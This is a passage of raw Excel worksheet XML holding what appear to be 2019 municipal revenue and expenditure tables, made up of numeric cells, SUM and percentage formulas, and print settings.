    <row r="26" spans="1:5" ht="20.25" customHeight="1">
      <c r="A26" s="175" t="s">
        <v>289</v>
      </c>
      <c r="B26" s="193">
        <f>'1、2019全市收入完成表'!C26</f>
        <v>24408</v>
      </c>
      <c r="C26" s="195">
        <v>22520</v>
      </c>
      <c r="D26" s="194">
        <f t="shared" si="0"/>
        <v>92.2648312028843</v>
      </c>
      <c r="E26" s="150"/>
    </row>
    <row r="27" spans="1:5" ht="20.25" customHeight="1">
      <c r="A27" s="175" t="s">
        <v>290</v>
      </c>
      <c r="B27" s="193">
        <f>'1、2019全市收入完成表'!C27</f>
        <v>11332</v>
      </c>
      <c r="C27" s="195">
        <v>11331</v>
      </c>
      <c r="D27" s="194">
        <f t="shared" si="0"/>
        <v>99.99117543240381</v>
      </c>
      <c r="E27" s="150"/>
    </row>
    <row r="28" spans="1:5" s="188" customFormat="1" ht="20.25" customHeight="1">
      <c r="A28" s="17" t="s">
        <v>291</v>
      </c>
      <c r="B28" s="193">
        <f>'1、2019全市收入完成表'!C28</f>
        <v>7266</v>
      </c>
      <c r="C28" s="195">
        <v>6603</v>
      </c>
      <c r="D28" s="194">
        <f t="shared" si="0"/>
        <v>90.87530966143683</v>
      </c>
      <c r="E28" s="146"/>
    </row>
    <row r="29" spans="1:5" ht="20.25" customHeight="1">
      <c r="A29" s="13" t="s">
        <v>292</v>
      </c>
      <c r="B29" s="193">
        <f>'1、2019全市收入完成表'!C29</f>
        <v>577372</v>
      </c>
      <c r="C29" s="195">
        <f>571440+64716</f>
        <v>636156</v>
      </c>
      <c r="D29" s="14">
        <f t="shared" si="0"/>
        <v>110.18130425444947</v>
      </c>
      <c r="E29" s="150"/>
    </row>
    <row r="30" spans="1:5" ht="20.25" customHeight="1">
      <c r="A30" s="198" t="s">
        <v>293</v>
      </c>
      <c r="B30" s="193">
        <f>'1、2019全市收入完成表'!C30</f>
        <v>492213</v>
      </c>
      <c r="C30" s="195">
        <v>583306</v>
      </c>
      <c r="D30" s="14">
        <f t="shared" si="0"/>
        <v>118.50682529717827</v>
      </c>
      <c r="E30" s="199"/>
    </row>
    <row r="31" spans="1:5" ht="20.25" customHeight="1">
      <c r="A31" s="13" t="s">
        <v>295</v>
      </c>
      <c r="B31" s="193">
        <f>'1、2019全市收入完成表'!C31</f>
        <v>3206</v>
      </c>
      <c r="C31" s="200">
        <v>5816</v>
      </c>
      <c r="D31" s="14">
        <f t="shared" si="0"/>
        <v>181.40985651902685</v>
      </c>
      <c r="E31" s="13"/>
    </row>
    <row r="32" ht="24.75" customHeight="1"/>
    <row r="33" ht="24.75" customHeight="1"/>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24.75" customHeight="1"/>
    <row r="192" ht="24.75" customHeight="1"/>
    <row r="193" ht="24.75" customHeight="1"/>
    <row r="194" ht="24.75" customHeight="1"/>
    <row r="195" ht="24.75" customHeight="1"/>
    <row r="196" ht="24.75" customHeight="1"/>
    <row r="197" ht="24.75" customHeight="1"/>
    <row r="198" ht="24.75" customHeight="1"/>
    <row r="199" ht="24.75" customHeight="1"/>
    <row r="200" ht="24.75" customHeight="1"/>
    <row r="201" ht="24.75" customHeight="1"/>
    <row r="202" ht="24.75" customHeight="1"/>
    <row r="203" ht="24.75" customHeight="1"/>
    <row r="204" ht="24.75" customHeight="1"/>
    <row r="205" ht="24.75" customHeight="1"/>
    <row r="206" ht="24.75" customHeight="1"/>
    <row r="207" ht="24.75" customHeight="1"/>
    <row r="208" ht="24.75" customHeight="1"/>
    <row r="209" ht="24.75" customHeight="1"/>
    <row r="210" ht="24.75" customHeight="1"/>
    <row r="211" ht="24.75" customHeight="1"/>
    <row r="212" ht="24.75" customHeight="1"/>
    <row r="213" ht="24.75" customHeight="1"/>
    <row r="214" ht="24.75" customHeight="1"/>
    <row r="215" ht="24.75" customHeight="1"/>
    <row r="216" ht="24.75" customHeight="1"/>
    <row r="217" ht="24.75" customHeight="1"/>
    <row r="218" ht="24.75" customHeight="1"/>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:E1"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.51" footer="0.47"/>
  <pageSetup firstPageNumber="9" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
  <headerFooter alignWithMargins="0">
    <oddFooter>&amp;C第 &amp;P 页</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet12.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:J28"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0" topLeftCell="A1">
      <pane xSplit="1" ySplit="3" topLeftCell="B14" activePane="bottomRight" state="frozen"/>
      <selection pane="bottomRight" activeCell="J19" sqref="J19"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="17.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="36.125" style="90" customWidth="1"/>
    <col min="2" max="2" width="10.625" style="88" customWidth="1"/>
    <col min="3" max="3" width="14.25390625" style="88" customWidth="1"/>
    <col min="4" max="4" width="10.625" style="90" customWidth="1"/>
    <col min="5" max="5" width="13.75390625" style="90" customWidth="1"/>
    <col min="6" max="6" width="15.00390625" style="90" customWidth="1"/>
    <col min="7" max="7" width="27.375" style="90" customWidth="1"/>
    <col min="8" max="8" width="9.625" style="90" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="13.25390625" style="90" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="14.50390625" style="90" bestFit="1" customWidth="1"/>
    <col min="11" max="16384" width="9.00390625" style="90" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" s="88" customFormat="1" ht="31.5" customHeight="1">
      <c r="A1" s="176" t="s">
        <v>357</v>
      </c>
      <c r="B1" s="176"/>
      <c r="C1" s="176"/>
      <c r="D1" s="176"/>
      <c r="E1" s="176"/>
      <c r="F1" s="176"/>
      <c r="G1" s="176"/>
    </row>
    <row r="2" spans="1:7" ht="17.25" customHeight="1">
      <c r="A2" s="177" t="s">
        <v>358</v>
      </c>
      <c r="D2" s="92"/>
      <c r="E2" s="92"/>
      <c r="F2" s="178"/>
      <c r="G2" s="179" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="3" spans="1:9" ht="40.5" customHeight="1">
      <c r="A3" s="11" t="s">
        <v>298</v>
      </c>
      <c r="B3" s="12" t="s">
        <v>359</v>
      </c>
      <c r="C3" s="12" t="s">
        <v>360</v>
      </c>
      <c r="D3" s="12" t="s">
        <v>361</v>
      </c>
      <c r="E3" s="12" t="s">
        <v>360</v>
      </c>
      <c r="F3" s="11" t="s">
        <v>362</v>
      </c>
      <c r="G3" s="11" t="s">
        <v>356</v>
      </c>
      <c r="H3" s="110"/>
      <c r="I3" s="110"/>
    </row>
    <row r="4" spans="1:10" s="89" customFormat="1" ht="24.75" customHeight="1">
      <c r="A4" s="125" t="s">
        <v>363</v>
      </c>
      <c r="B4" s="107">
        <f>SUM(B5:B25)</f>
        <v>3232741</v>
      </c>
      <c r="C4" s="107">
        <f>SUM(C5:C25)</f>
        <v>2184041</v>
      </c>
      <c r="D4" s="107">
        <f>SUM(D5:D25)</f>
        <v>3645611</v>
      </c>
      <c r="E4" s="107">
        <f>SUM(E5:E25)</f>
        <v>2261331</v>
      </c>
      <c r="F4" s="180">
        <f>E4/C4*100</f>
        <v>103.53885297940835</v>
      </c>
      <c r="G4" s="100"/>
      <c r="H4" s="110"/>
      <c r="I4" s="110"/>
      <c r="J4" s="110"/>
    </row>
    <row r="5" spans="1:10" ht="24.75" customHeight="1">
      <c r="A5" s="108" t="s">
        <v>305</v>
      </c>
      <c r="B5" s="100">
        <f>314625+30000+20000</f>
        <v>364625</v>
      </c>
      <c r="C5" s="181">
        <f>303311+30000+20000</f>
        <v>353311</v>
      </c>
      <c r="D5" s="107">
        <v>366512</v>
      </c>
      <c r="E5" s="182">
        <v>344939</v>
      </c>
      <c r="F5" s="180">
        <f aca="true" t="shared" si="0" ref="F5:F28">E5/C5*100</f>
        <v>97.63041626215997</v>
      </c>
      <c r="G5" s="100"/>
      <c r="H5" s="110"/>
      <c r="I5" s="110"/>
      <c r="J5" s="89"/>
    </row>
    <row r="6" spans="1:10" ht="24.75" customHeight="1">
      <c r="A6" s="108" t="s">
        <v>306</v>
      </c>
      <c r="B6" s="100">
        <v>388</v>
      </c>
      <c r="C6" s="181">
        <v>368</v>
      </c>
      <c r="D6" s="107">
        <v>404</v>
      </c>
      <c r="E6" s="182">
        <v>404</v>
      </c>
      <c r="F6" s="180">
        <f t="shared" si="0"/>
        <v>109.78260869565217</v>
      </c>
      <c r="G6" s="125"/>
      <c r="H6" s="110"/>
      <c r="J6" s="89"/>
    </row>
    <row r="7" spans="1:10" ht="24.75" customHeight="1">
      <c r="A7" s="108" t="s">
        <v>307</v>
      </c>
      <c r="B7" s="100">
        <f>115241+5000</f>
        <v>120241</v>
      </c>
      <c r="C7" s="100">
        <f>110803-11508+5000</f>
        <v>104295</v>
      </c>
      <c r="D7" s="100">
        <f>130345</f>
        <v>130345</v>
      </c>
      <c r="E7" s="173">
        <f>112742-10367</f>
        <v>102375</v>
      </c>
      <c r="F7" s="180">
        <f t="shared" si="0"/>
        <v>98.15906802818927</v>
      </c>
      <c r="G7" s="125"/>
      <c r="H7" s="110"/>
      <c r="I7" s="187"/>
      <c r="J7" s="89"/>
    </row>
    <row r="8" spans="1:10" ht="24.75" customHeight="1">
      <c r="A8" s="108" t="s">
        <v>308</v>
      </c>
      <c r="B8" s="100">
        <f>618850</f>
        <v>618850</v>
      </c>
      <c r="C8" s="100">
        <f>547542-52604</f>
        <v>494938</v>
      </c>
      <c r="D8" s="100">
        <f>664360</f>
        <v>664360</v>
      </c>
      <c r="E8" s="173">
        <f>611362-85071</f>
        <v>526291</v>
      </c>
      <c r="F8" s="180">
        <f t="shared" si="0"/>
        <v>106.3347328352238</v>
      </c>
      <c r="G8" s="125"/>
      <c r="H8" s="110"/>
      <c r="J8" s="89"/>
    </row>
    <row r="9" spans="1:10" ht="24.75" customHeight="1">
      <c r="A9" s="108" t="s">
        <v>309</v>
      </c>
      <c r="B9" s="100">
        <f>12748+1500+4000</f>
        <v>18248</v>
      </c>
      <c r="C9" s="100">
        <f>12644+1500+4000</f>
        <v>18144</v>
      </c>
      <c r="D9" s="100">
        <v>19282</v>
      </c>
      <c r="E9" s="173">
        <f>19143-174</f>
        <v>18969</v>
      </c>
      <c r="F9" s="180">
        <f t="shared" si="0"/>
        <v>104.54695767195767</v>
      </c>
      <c r="G9" s="125"/>
      <c r="H9" s="110"/>
      <c r="J9" s="89"/>
    </row>
    <row r="10" spans="1:10" ht="24.75" customHeight="1">
      <c r="A10" s="108" t="s">
        <v>310</v>
      </c>
      <c r="B10" s="100">
        <v>76073</v>
      </c>
      <c r="C10" s="100">
        <v>59914</v>
      </c>
      <c r="D10" s="100">
        <f>82452+2000</f>
        <v>84452</v>
      </c>
      <c r="E10" s="173">
        <f>67378-8457+2000</f>
        <v>60921</v>
      </c>
      <c r="F10" s="180">
        <f t="shared" si="0"/>
        <v>101.68074239743632</v>
      </c>
      <c r="G10" s="125"/>
      <c r="H10" s="110"/>
      <c r="J10" s="89"/>
    </row>
    <row r="11" spans="1:10" ht="24.75" customHeight="1">
      <c r="A11" s="108" t="s">
        <v>311</v>
      </c>
      <c r="B11" s="100">
        <f>526180-10000+105340</f>
        <v>621520</v>
      </c>
      <c r="C11" s="100">
        <f>446917-65091-10000</f>
        <v>371826</v>
      </c>
      <c r="D11" s="100">
        <f>568753+50000</f>
        <v>618753</v>
      </c>
      <c r="E11" s="173">
        <f>535397-190115+50000</f>
        <v>395282</v>
      </c>
      <c r="F11" s="180">
        <f t="shared" si="0"/>
        <v>106.30832701317283</v>
      </c>
      <c r="G11" s="125"/>
      <c r="H11" s="110"/>
      <c r="J11" s="89"/>
    </row>
    <row r="12" spans="1:10" ht="24.75" customHeight="1">
      <c r="A12" s="108" t="s">
        <v>312</v>
      </c>
      <c r="B12" s="100">
        <f>386625</f>
        <v>386625</v>
      </c>
      <c r="C12" s="100">
        <f>377089-153348-45662</f>
        <v>178079</v>
      </c>
      <c r="D12" s="100">
        <f>434713-15000</f>
        <v>419713</v>
      </c>
      <c r="E12" s="173">
        <f>432223-231112-15000</f>
        <v>186111</v>
      </c>
      <c r="F12" s="180">
        <f t="shared" si="0"/>
        <v>104.51035776256606</v>
      </c>
      <c r="G12" s="125"/>
      <c r="H12" s="110"/>
      <c r="J12" s="89"/>
    </row>
    <row r="13" spans="1:10" ht="24.75" customHeight="1">
      <c r="A13" s="157" t="s">
        <v>313</v>
      </c>
      <c r="B13" s="100">
        <f>61918+25000+2000</f>
        <v>88918</v>
      </c>
      <c r="C13" s="100">
        <f>30187+25000+2000</f>
        <v>57187</v>
      </c>
      <c r="D13" s="100">
        <v>137723</v>
      </c>
      <c r="E13" s="173">
        <f>79891-17974</f>
        <v>61917</v>
      </c>
      <c r="F13" s="180">
        <f t="shared" si="0"/>
        <v>108.27111056708691</v>
      </c>
      <c r="G13" s="125"/>
      <c r="H13" s="110"/>
      <c r="J13" s="89"/>
    </row>
    <row r="14" spans="1:10" ht="24.75" customHeight="1">
      <c r="A14" s="108" t="s">
        <v>314</v>
      </c>
      <c r="B14" s="100">
        <f>219855-4000</f>
        <v>215855</v>
      </c>
      <c r="C14" s="100">
        <f>125576-4000</f>
        <v>121576</v>
      </c>
      <c r="D14" s="100">
        <f>261507+30000</f>
        <v>291507</v>
      </c>
      <c r="E14" s="173">
        <f>89987+30000</f>
        <v>119987</v>
      </c>
      <c r="F14" s="180">
        <f t="shared" si="0"/>
        <v>98.69299861814832</v>
      </c>
      <c r="G14" s="125"/>
      <c r="H14" s="110"/>
      <c r="J14" s="89"/>
    </row>
    <row r="15" spans="1:10" ht="24.75" customHeight="1">
      <c r="A15" s="108" t="s">
        <v>315</v>
      </c>
      <c r="B15" s="100">
        <f>313612-8000</f>
        <v>305612</v>
      </c>
      <c r="C15" s="100">
        <f>212282-8000</f>
        <v>204282</v>
      </c>
      <c r="D15" s="100">
        <f>499278+25000</f>
        <v>524278</v>
      </c>
      <c r="E15" s="173">
        <f>408132-217196+25000</f>
        <v>215936</v>
      </c>
      <c r="F15" s="180">
        <f t="shared" si="0"/>
        <v>105.70485896946377</v>
      </c>
      <c r="G15" s="125"/>
      <c r="H15" s="110"/>
      <c r="J15" s="89"/>
    </row>
    <row r="16" spans="1:10" ht="24.75" customHeight="1">
      <c r="A16" s="108" t="s">
        <v>316</v>
      </c>
      <c r="B16" s="100">
        <f>44573+15000</f>
        <v>59573</v>
      </c>
      <c r="C16" s="100">
        <f>27837+15000</f>
        <v>42837</v>
      </c>
      <c r="D16" s="100">
        <f>94413</f>
        <v>94413</v>
      </c>
      <c r="E16" s="173">
        <f>58124-14184</f>
        <v>43940</v>
      </c>
      <c r="F16" s="180">
        <f t="shared" si="0"/>
        <v>102.5748768587903</v>
      </c>
      <c r="G16" s="100"/>
      <c r="H16" s="110"/>
      <c r="J16" s="89"/>
    </row>
    <row r="17" spans="1:10" ht="24.75" customHeight="1">
      <c r="A17" s="156" t="s">
        <v>317</v>
      </c>
      <c r="B17" s="100">
        <v>22039</v>
      </c>
      <c r="C17" s="100">
        <v>13304</v>
      </c>
      <c r="D17" s="100">
        <v>24559</v>
      </c>
      <c r="E17" s="173">
        <v>13783</v>
      </c>
      <c r="F17" s="180">
        <f t="shared" si="0"/>
        <v>103.60042092603727</v>
      </c>
      <c r="G17" s="100"/>
      <c r="H17" s="110"/>
      <c r="J17" s="89"/>
    </row>
    <row r="18" spans="1:10" ht="24.75" customHeight="1">
      <c r="A18" s="156" t="s">
        <v>318</v>
      </c>
      <c r="B18" s="100">
        <f>4969+200</f>
        <v>5169</v>
      </c>
      <c r="C18" s="181">
        <f>3428+200</f>
        <v>3628</v>
      </c>
      <c r="D18" s="107">
        <v>4946</v>
      </c>
      <c r="E18" s="182">
        <v>3897</v>
      </c>
      <c r="F18" s="180">
        <f t="shared" si="0"/>
        <v>107.41455347298788</v>
      </c>
      <c r="G18" s="100"/>
      <c r="H18" s="110"/>
      <c r="J18" s="89"/>
    </row>
    <row r="19" spans="1:10" ht="24.75" customHeight="1">
      <c r="A19" s="156" t="s">
        <v>319</v>
      </c>
      <c r="B19" s="100">
        <v>1485</v>
      </c>
      <c r="C19" s="100">
        <v>485</v>
      </c>
      <c r="D19" s="100">
        <v>446</v>
      </c>
      <c r="E19" s="173">
        <v>446</v>
      </c>
      <c r="F19" s="180">
        <f t="shared" si="0"/>
        <v>91.95876288659794</v>
      </c>
      <c r="G19" s="100"/>
      <c r="H19" s="110"/>
      <c r="J19" s="89"/>
    </row>
    <row r="20" spans="1:10" ht="24.75" customHeight="1">
      <c r="A20" s="156" t="s">
        <v>321</v>
      </c>
      <c r="B20" s="100">
        <v>28230</v>
      </c>
      <c r="C20" s="100">
        <v>22637</v>
      </c>
      <c r="D20" s="100">
        <v>25674</v>
      </c>
      <c r="E20" s="173">
        <v>23246</v>
      </c>
      <c r="F20" s="180">
        <f t="shared" si="0"/>
        <v>102.6902858152582</v>
      </c>
      <c r="G20" s="100"/>
      <c r="H20" s="110"/>
      <c r="J20" s="89"/>
    </row>
    <row r="21" spans="1:10" ht="24.75" customHeight="1">
      <c r="A21" s="156" t="s">
        <v>322</v>
      </c>
      <c r="B21" s="100">
        <f>96966</f>
        <v>96966</v>
      </c>
      <c r="C21" s="100">
        <f>58383-3368</f>
        <v>55015</v>
      </c>
      <c r="D21" s="100">
        <f>73384+100</f>
        <v>73484</v>
      </c>
      <c r="E21" s="173">
        <f>60855-3578+100</f>
        <v>57377</v>
      </c>
      <c r="F21" s="180">
        <f t="shared" si="0"/>
        <v>104.29337453421795</v>
      </c>
      <c r="G21" s="100"/>
      <c r="H21" s="110"/>
      <c r="J21" s="89"/>
    </row>
    <row r="22" spans="1:10" ht="24.75" customHeight="1">
      <c r="A22" s="156" t="s">
        <v>323</v>
      </c>
      <c r="B22" s="100">
        <v>9030</v>
      </c>
      <c r="C22" s="100">
        <v>8049</v>
      </c>
      <c r="D22" s="100">
        <v>7089</v>
      </c>
      <c r="E22" s="173">
        <v>6300</v>
      </c>
      <c r="F22" s="180">
        <f t="shared" si="0"/>
        <v>78.27059262020126</v>
      </c>
      <c r="G22" s="100"/>
      <c r="H22" s="110"/>
      <c r="J22" s="89"/>
    </row>
    <row r="23" spans="1:10" ht="24.75" customHeight="1">
      <c r="A23" s="156" t="s">
        <v>324</v>
      </c>
      <c r="B23" s="100">
        <v>16150</v>
      </c>
      <c r="C23" s="100">
        <v>13869</v>
      </c>
      <c r="D23" s="100">
        <v>16730</v>
      </c>
      <c r="E23" s="173">
        <v>15087</v>
      </c>
      <c r="F23" s="180">
        <f t="shared" si="0"/>
        <v>108.78217607614103</v>
      </c>
      <c r="G23" s="100"/>
      <c r="H23" s="110"/>
      <c r="J23" s="89"/>
    </row>
    <row r="24" spans="1:10" ht="24.75" customHeight="1">
      <c r="A24" s="156" t="s">
        <v>325</v>
      </c>
      <c r="B24" s="100">
        <v>31481</v>
      </c>
      <c r="C24" s="100">
        <v>31481</v>
      </c>
      <c r="D24" s="100">
        <v>39011</v>
      </c>
      <c r="E24" s="173">
        <v>39011</v>
      </c>
      <c r="F24" s="180">
        <f t="shared" si="0"/>
        <v>123.91918935230774</v>
      </c>
      <c r="G24" s="100"/>
      <c r="H24" s="110"/>
      <c r="J24" s="89"/>
    </row>
    <row r="25" spans="1:10" ht="24.75" customHeight="1">
      <c r="A25" s="108" t="s">
        <v>327</v>
      </c>
      <c r="B25" s="100">
        <f>334449-2746-30000-1500-25000-15000-200-20000-2000-5000-105340+8000+10000</f>
        <v>145663</v>
      </c>
      <c r="C25" s="100">
        <f>217610-2746-8-30000-1500-25000-15000-200-20000-2000-5000-105340+8000+10000</f>
        <v>28816</v>
      </c>
      <c r="D25" s="100">
        <f>194015-2000-50000+15000-30000-25000-100+15</f>
        <v>101930</v>
      </c>
      <c r="E25" s="173">
        <f>123279-2000-50000+15000-30000-25000-100-6071-11+15</f>
        <v>25112</v>
      </c>
      <c r="F25" s="180">
        <f t="shared" si="0"/>
        <v>87.14602998334259</v>
      </c>
      <c r="G25" s="100"/>
      <c r="H25" s="110"/>
      <c r="J25" s="89"/>
    </row>
    <row r="26" spans="1:7" s="160" customFormat="1" ht="24.75" customHeight="1">
      <c r="A26" s="183" t="s">
        <v>328</v>
      </c>
      <c r="B26" s="173">
        <v>668888</v>
      </c>
      <c r="C26" s="173">
        <v>360014</v>
      </c>
      <c r="D26" s="173">
        <f>790417+64716</f>
        <v>855133</v>
      </c>
      <c r="E26" s="173">
        <v>636156</v>
      </c>
      <c r="F26" s="184">
        <f t="shared" si="0"/>
        <v>176.70312821168065</v>
      </c>
      <c r="G26" s="173"/>
    </row>
    <row r="27" spans="1:7" s="160" customFormat="1" ht="24.75" customHeight="1">
      <c r="A27" s="185" t="s">
        <v>364</v>
      </c>
      <c r="B27" s="173">
        <v>482664</v>
      </c>
      <c r="C27" s="173">
        <v>318482</v>
      </c>
      <c r="D27" s="173">
        <f>645462+56341+4700</f>
        <v>706503</v>
      </c>
      <c r="E27" s="173">
        <v>583306</v>
      </c>
      <c r="F27" s="184">
        <f t="shared" si="0"/>
        <v>183.1519520726446</v>
      </c>
      <c r="G27" s="186" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="28" spans="1:7" ht="24.75" customHeight="1">
      <c r="A28" s="13" t="s">
        <v>330</v>
      </c>
      <c r="B28" s="100">
        <v>50254</v>
      </c>
      <c r="C28" s="181">
        <v>3206</v>
      </c>
      <c r="D28" s="107">
        <v>9074</v>
      </c>
      <c r="E28" s="107">
        <v>5816</v>
      </c>
      <c r="F28" s="180">
        <f t="shared" si="0"/>
        <v>181.40985651902685</v>
      </c>
      <c r="G28" s="100"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:G1"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.5" footer="0.47"/>
  <pageSetup firstPageNumber="11" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
  <headerFooter alignWithMargins="0">
    <oddFooter>&amp;C第 &amp;P 页</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet13.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:E20"/>
  <sheetViews>
    <sheetView zoomScaleSheetLayoutView="100" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="B13" sqref="B13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="49.75390625" style="0" customWidth="1"/>
    <col min="2" max="4" width="17.75390625" style="0" customWidth="1"/>
    <col min="5" max="5" width="24.00390625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" ht="48.75" customHeight="1">
      <c r="A1" s="118" t="s">
        <v>365</v>
      </c>
      <c r="B1" s="118"/>
      <c r="C1" s="118"/>
      <c r="D1" s="118"/>
      <c r="E1" s="118"/>
    </row>
    <row r="2" spans="1:5" ht="18" customHeight="1">
      <c r="A2" s="120" t="s">
        <v>366</v>
      </c>
      <c r="B2" s="121"/>
      <c r="C2" s="122"/>
      <c r="D2" s="121"/>
      <c r="E2" s="123" t="s">
        <v>367</v>
      </c>
    </row>
    <row r="3" spans="1:5" ht="28.5">
      <c r="A3" s="135" t="s">
        <v>260</v>
      </c>
      <c r="B3" s="12" t="s">
        <v>353</v>
      </c>
      <c r="C3" s="12" t="s">
        <v>354</v>
      </c>
      <c r="D3" s="136" t="s">
        <v>368</v>
      </c>
      <c r="E3" s="135" t="s">
        <v>356</v>
      </c>
    </row>
    <row r="4" spans="1:5" ht="21.75" customHeight="1">
      <c r="A4" s="13" t="s">
        <v>267</v>
      </c>
      <c r="B4" s="137">
        <f>SUM(B5,B14)</f>
        <v>184489</v>
      </c>
      <c r="C4" s="137">
        <f>SUM(C5,C14)</f>
        <v>205500</v>
      </c>
      <c r="D4" s="105">
        <f aca="true" t="shared" si="0" ref="D4:D12">100*C4/B4</f>
        <v>111.3887548851151</v>
      </c>
      <c r="E4" s="138"/>
    </row>
    <row r="5" spans="1:5" ht="21.75" customHeight="1">
      <c r="A5" s="17" t="s">
        <v>268</v>
      </c>
      <c r="B5" s="137">
        <f>'3、2019市级收入完成表'!C5</f>
        <v>134034</v>
      </c>
      <c r="C5" s="137">
        <f>SUM(C6:C12)</f>
        <v>137442</v>
      </c>
      <c r="D5" s="105">
        <f t="shared" si="0"/>
        <v>102.54263843502395</v>
      </c>
      <c r="E5" s="139"/>
    </row>
    <row r="6" spans="1:5" ht="21.75" customHeight="1">
      <c r="A6" s="17" t="s">
        <v>269</v>
      </c>
      <c r="B6" s="137">
        <v>79043</v>
      </c>
      <c r="C6" s="137">
        <v>81321</v>
      </c>
      <c r="D6" s="105">
        <f t="shared" si="0"/>
        <v>102.88197563351594</v>
      </c>
      <c r="E6" s="20"/>
    </row>
    <row r="7" spans="1:5" ht="21.75" customHeight="1">
      <c r="A7" s="17" t="s">
        <v>270</v>
      </c>
      <c r="B7" s="137">
        <v>21512</v>
      </c>
      <c r="C7" s="137">
        <v>23118</v>
      </c>
      <c r="D7" s="105">
        <f t="shared" si="0"/>
        <v>107.46560059501674</v>
      </c>
      <c r="E7" s="20"/>
    </row>
    <row r="8" spans="1:5" ht="21.75" customHeight="1">
      <c r="A8" s="17" t="s">
        <v>334</v>
      </c>
      <c r="B8" s="137">
        <v>4694</v>
      </c>
      <c r="C8" s="137">
        <v>5192</v>
      </c>
      <c r="D8" s="105">
        <f t="shared" si="0"/>
        <v>110.60928845334469</v>
      </c>
      <c r="E8" s="20"/>
    </row>
    <row r="9" spans="1:5" ht="21.75" customHeight="1">
      <c r="A9" s="17" t="s">
        <v>335</v>
      </c>
      <c r="B9" s="137">
        <v>11842</v>
      </c>
      <c r="C9" s="137">
        <v>12047</v>
      </c>
      <c r="D9" s="105">
        <f t="shared" si="0"/>
        <v>101.73112649890221</v>
      </c>
      <c r="E9" s="20"/>
    </row>
    <row r="10" spans="1:5" ht="21.75" customHeight="1">
      <c r="A10" s="142" t="s">
        <v>336</v>
      </c>
      <c r="B10" s="137">
        <v>14033</v>
      </c>
      <c r="C10" s="137">
        <v>12800</v>
      </c>
      <c r="D10" s="105">
        <f t="shared" si="0"/>
        <v>91.21356801824271</v>
      </c>
      <c r="E10" s="20"/>
    </row>
    <row r="11" spans="1:5" ht="21.75" customHeight="1">
      <c r="A11" s="142" t="s">
        <v>337</v>
      </c>
      <c r="B11" s="137">
        <v>341</v>
      </c>
      <c r="C11" s="137">
        <v>400</v>
      </c>
      <c r="D11" s="105">
        <f t="shared" si="0"/>
        <v>117.30205278592375</v>
      </c>
      <c r="E11" s="20"/>
    </row>
    <row r="12" spans="1:5" ht="21.75" customHeight="1">
      <c r="A12" s="142" t="s">
        <v>338</v>
      </c>
      <c r="B12" s="137">
        <v>2569</v>
      </c>
      <c r="C12" s="137">
        <v>2564</v>
      </c>
      <c r="D12" s="105">
        <f t="shared" si="0"/>
        <v>99.80537173997665</v>
      </c>
      <c r="E12" s="20"/>
    </row>
    <row r="13" spans="1:5" ht="21.75" customHeight="1">
      <c r="A13" s="140" t="s">
        <v>339</v>
      </c>
      <c r="B13" s="126"/>
      <c r="C13" s="126"/>
      <c r="D13" s="129"/>
      <c r="E13" s="141"/>
    </row>
    <row r="14" spans="1:5" ht="21.75" customHeight="1">
      <c r="A14" s="17" t="s">
        <v>285</v>
      </c>
      <c r="B14" s="137">
        <f>'3、2019市级收入完成表'!C14</f>
        <v>50455</v>
      </c>
      <c r="C14" s="145">
        <f>SUM(C15:C20)</f>
        <v>68058</v>
      </c>
      <c r="D14" s="105">
        <f aca="true" t="shared" si="1" ref="D14:D20">100*C14/B14</f>
        <v>134.88851451788722</v>
      </c>
      <c r="E14" s="20"/>
    </row>
    <row r="15" spans="1:5" ht="21.75" customHeight="1">
      <c r="A15" s="17" t="s">
        <v>340</v>
      </c>
      <c r="B15" s="137">
        <v>3826</v>
      </c>
      <c r="C15" s="137">
        <v>4000</v>
      </c>
      <c r="D15" s="105">
        <f t="shared" si="1"/>
        <v>104.54783063251438</v>
      </c>
      <c r="E15" s="20"/>
    </row>
    <row r="16" spans="1:5" ht="21.75" customHeight="1">
      <c r="A16" s="17" t="s">
        <v>341</v>
      </c>
      <c r="B16" s="137">
        <v>15131</v>
      </c>
      <c r="C16" s="137">
        <v>32808</v>
      </c>
      <c r="D16" s="105">
        <f t="shared" si="1"/>
        <v>216.82638292247702</v>
      </c>
      <c r="E16" s="20"/>
    </row>
    <row r="17" spans="1:5" ht="21.75" customHeight="1">
      <c r="A17" s="17" t="s">
        <v>342</v>
      </c>
      <c r="B17" s="137">
        <v>9494</v>
      </c>
      <c r="C17" s="137">
        <v>9500</v>
      </c>
      <c r="D17" s="105">
        <f t="shared" si="1"/>
        <v>100.06319780914262</v>
      </c>
      <c r="E17" s="20"/>
    </row>
    <row r="18" spans="1:5" ht="21.75" customHeight="1">
      <c r="A18" s="175" t="s">
        <v>343</v>
